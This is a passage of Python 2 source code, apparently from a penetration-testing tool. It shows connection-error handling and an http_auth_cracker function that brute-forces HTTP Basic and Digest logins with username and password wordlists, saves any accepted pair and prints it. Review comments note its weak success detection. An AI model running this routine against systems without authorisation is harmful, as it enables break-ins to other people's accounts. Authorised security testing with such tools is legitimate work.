    err_msg = str(err_msg).replace(": ", " (") + error_description + ")."
    if menu.options.bulkfile:
      warn_msg = "Skipping URL '" + url + "' - " + err_msg
      print(settings.print_warning_msg(warn_msg))
      if settings.EOF:
        print("")
      return False
    else:
      print(settings.print_critical_msg(err_msg))
      raise SystemExit
  except _urllib.error.URLError as e:
    err_msg = "Unable to connect to the target URL"
    try:
      err_msg += " (" + str(e.args[0]).split("] ")[1] + ")."
    except IndexError:
      err_msg += "."
      pass
    if menu.options.bulkfile:
      err_msg = "Skipping URL '" + url + "' - " + err_msg
      print(settings.print_critical_msg(err_msg))
      if settings.EOF:
        print("")
      return False
    else:
      print(settings.print_critical_msg(err_msg))
      raise SystemExit
def http_auth_cracker(url, realm):
  """Try every username/password pair from the wordlists against the
  HTTP authentication protecting ``url`` (Python 2 / urllib2 variant).

  Args:
    url: Target URL answering with an HTTP authentication challenge.
    realm: Authentication realm; used only by the "digest" branch
      (passed to HTTPDigestAuthHandler.add_password).

  Returns:
    The first accepted pair as the string "username:password", or False
    once both wordlists are exhausted without a success.

  Side effects:
    Writes progress to stdout (the pair under test is echoed to the
    terminal when VERBOSITY_LEVEL >= 1), records an accepted pair through
    session_handler.import_valid_credentials (storage format not visible
    here), and for "digest" installs a process-wide opener via
    urllib2.install_opener that stays in place after this function
    returns. Unlike the other http_auth_cracker variant in this listing,
    --proxy / --tor are not consulted here.

  NOTE(review): success is inferred only from urlopen() not raising;
  ``result`` is never inspected. The bare ``except:`` below swallows every
  exception other than KeyboardInterrupt (SystemExit included), so a
  broken attempt is indistinguishable from a wrong guess.
  """
  # Define the HTTP authentication type.
  authentication_type = menu.options.auth_type
  # Define the authentication wordlists for usernames / passwords.
  usernames, passwords = define_wordlists()
  # i is the attempt index used for the progress percentage; it is only
  # advanced in the not-found branch further down.
  i = 1
  found = False
  total = len(usernames) * len(passwords)
  for username in usernames:
    for password in passwords:
      # "total*1.0" forces float division under Python 2.
      float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2))
      # Check if verbose mode on
      if settings.VERBOSITY_LEVEL >= 1:
        payload = "pair of credentials '" + username + ":" + password + "'"
        if settings.VERBOSITY_LEVEL > 1:
          print settings.print_checking_msg(payload)
        else:
          sys.stdout.write("\r" + settings.print_checking_msg(payload) + " ")
          sys.stdout.flush()
      try:
        # Basic authentication
        if authentication_type.lower() == "basic":
          request = urllib2.Request(url)
          # [:-1] strips the trailing newline encodestring appends.
          base64string = base64.encodestring(username + ":" + password)[:-1]
          request.add_header("Authorization", "Basic " + base64string)
          headers.do_check(request)
          headers.check_http_traffic(request)
          result = urllib2.urlopen(request)
        # Digest authentication
        elif authentication_type.lower() == "digest":
          authhandler = urllib2.HTTPDigestAuthHandler()
          authhandler.add_password(realm, url, username, password)
          opener = urllib2.build_opener(authhandler)
          # Global: every later urlopen() in this process uses this opener.
          urllib2.install_opener(opener)
          request = urllib2.Request(url)
          headers.check_http_traffic(request)
          result = urllib2.urlopen(request)
        # Store valid results to session
        admin_panel = url
        session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password)
        found = True
      except KeyboardInterrupt :
        raise
      except:
        # Any failure (network, scheme mismatch, coding error) is treated
        # as "pair rejected"; nothing is logged here.
        pass
      if found:
        if not settings.VERBOSITY_LEVEL >= 1:
          float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
      else:
        if str(float_percent) == "100.0%":
          if not settings.VERBOSITY_LEVEL >= 1:
            float_percent = Fore.RED + "FAILED" + Style.RESET_ALL
        else:
          i = i + 1
      if not settings.VERBOSITY_LEVEL >= 1:
        info_msg = "Checking for a valid pair of credentials... [ " + float_percent + " ]"
        sys.stdout.write("\r\r" + settings.print_info_msg(info_msg))
        sys.stdout.flush()
      if found:
        # First accepted pair ends the search.
        valid_pair = "" + username + ":" + password + ""
        print ""
        success_msg = "Identified a valid pair of credentials '"
        success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'."
        print settings.print_success_msg(success_msg)
        return valid_pair
  err_msg = "Use the '--auth-cred' option to provide a valid pair of "
  err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
  err_msg += "or place an other dictionary into '"
  err_msg += os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
  print "\n" + settings.print_critical_msg(err_msg)
  return False
# eof